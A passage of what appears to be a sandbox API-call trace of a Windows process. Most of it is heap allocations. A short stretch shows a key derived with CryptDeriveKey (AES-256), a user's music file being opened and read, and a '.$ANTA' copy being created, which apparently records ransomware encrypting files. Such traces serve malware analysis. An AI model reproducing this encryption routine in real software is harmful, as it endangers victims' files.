(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0117.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0117.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0117.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0117.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0117.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0117.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0117.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0117.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0117.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0117.922] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0117.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca8f8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.923] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0117.923] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac640) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0117.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0117.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.925] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.925] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0117.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0117.951] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0117.951] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\KxIfNFq_eT6K4Yywd.m4a" (normalized: "c:\\users\\fd1hvy\\music\\tg2o\\kxifnfq_et6k4yywd.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0117.951] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.951] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0117.951] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\" (normalized: "c:\\users\\fd1hvy\\music\\tg2o")) returned 0x10 [0117.951] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\KxIfNFq_eT6K4Yywd.m4a.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\tg2o\\kxifnfq_et6k4yywd.m4a.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0117.954] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0117.954] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x747e, lpOverlapped=0x0) returned 1 [0117.955] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0117.958] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0117.958] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0117.958] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0117.958] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.958] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0117.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ee8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0117.958] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e2590, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2590*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0117.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea490 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0117.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e18 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea6b8 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0117.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0117.961] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9128 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0117.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0117.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0117.963] RtlAllocateHeap (HeapHandle=0x1780000, 